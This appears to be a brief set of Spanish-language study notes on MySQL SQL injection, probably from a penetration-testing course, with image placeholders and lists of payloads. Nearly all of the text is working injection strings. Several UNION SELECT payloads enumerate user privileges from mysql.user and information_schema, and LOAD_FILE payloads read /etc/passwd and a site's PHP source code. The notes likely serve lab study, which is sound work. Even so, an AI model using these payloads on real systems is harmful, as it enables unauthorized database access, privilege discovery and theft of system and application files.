• Usando logica de la query:

    image.png

  • Usando comentarios

    image.png

    image.png

  • Privilegios:

    • select super_priv from mysql.user;
    • ‘ UNION SELECT 1,super_priv,3,4 FROM mysql.user—
    • ‘ UNION SELECT 1,super_priv,3,4 FROM mysql.user WHERE user="" —
    • UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
    • cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

  • PRIVILEGIOS LOAD FILE

    • SELECT LOAD_FILE(’/etc/passwd’)
    • cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -